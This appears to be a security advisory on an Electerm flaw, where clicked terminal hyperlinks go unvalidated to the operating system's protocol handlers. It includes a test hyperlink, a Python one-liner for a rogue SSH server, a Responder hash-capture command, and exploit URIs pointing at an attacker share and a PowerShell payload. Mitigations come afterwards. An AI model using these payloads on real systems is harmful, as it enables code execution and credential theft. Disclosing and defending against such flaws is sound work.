Listen to this Post
The vulnerability exists in Electerm’s terminal hyperlink handling. When a user clicks any URL displayed in the terminal, the application calls Electron’s `shell.openExternal` without validating the URI scheme. A malicious SSH server can print crafted links (e.g., ms-msdt:/c/calc, search-ms:query=exploit, file:///etc/passwd) in the terminal output. Because `shell.openExternal` invokes the operating system’s default protocol handler, an attacker who controls terminal content can force the victim’s machine to execute arbitrary commands, open local files, or leak NTLM hashes via UNC paths. The function does not restrict dangerous URI schemes like `ms-msdt:` (which triggers Microsoft Support Diagnostic Tool) or `search-ms:` (which can launch file explorer with remote shares). No origin or scheme whitelist is applied. Electron’s own security recommendations explicitly warn against unsanitized `shell.openExternal` usage, but Electerm fails to implement filtering. The attack requires only a single click from the user, making it a classic “one-click RCE”. Since Electerm renders ANSI hyperlinks (OSC 8 sequences) by default, any terminal output from an untrusted remote host becomes a potential attack vector. The issue affects all platforms where Electerm runs (Windows, Linux, macOS) because `shell.openExternal` delegates to native handlers. Windows environments are especially exposed due to legacy protocol handlers like `ms-msdt:` (CVE-2022-30190 – “Follina”) and `search-ms:` that enable code execution without further user interaction beyond the click. The absence of patch in v3.7.9 leaves users vulnerable.
dailycve form:
Platform: Electerm / Electron
Version: up to 3.7.9
Vulnerability: Unvalidated protocol handler
Severity: Critical
date: Unknown
Prediction: Patch after 3 months
What Undercode Say:
Analytics:
Test if terminal renders OSC 8 hyperlink
echo -e '\e]8;;ms-msdt:/c/calc\e\Click me\e]8;;\e\'
Simulate malicious SSH server (Python)
python3 -c "import socket, sys; s=socket.socket(); s.bind(('0.0.0.0', 2222)); s.listen(1); conn, addr=s.accept(); conn.send(b'SSH-2.0-OpenSSH\r\n'); conn.send(b'\x1b]8;;search-ms:query=exploit\x1b\CLICK TO OWN\x1b]8;;\x1b\\r\n'); conn.close()"
Monitor NTLM hash leakage (responder)
sudo responder -I eth0 -wrf
Exploit:
Attacker sets up rogue SSH server that prints `file://attacker/share/evil.hta` or `ms-msdt:/c/powershell%20-e YOUR_PAYLOAD` as a clickable hyperlink. Victim clicks link → `shell.openExternal` passes URI to OS → arbitrary code execution or hash leak.
Protection:
Do not click terminal links from untrusted hosts. Disable hyperlink rendering in Electerm settings (Settings → Terminal → Disable hyperlinks). Run Electerm inside a sandbox (Firejail, AppArmor) or restrict protocol handlers via Group Policy (Windows). Use `tmux` as a proxy to strip OSC 8 sequences.
Impact:
Arbitrary code execution, NTLM hash exfiltration, local file disclosure, launching installed applications via custom URI schemes. Remote attacker with terminal output control can compromise the client machine with one click.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
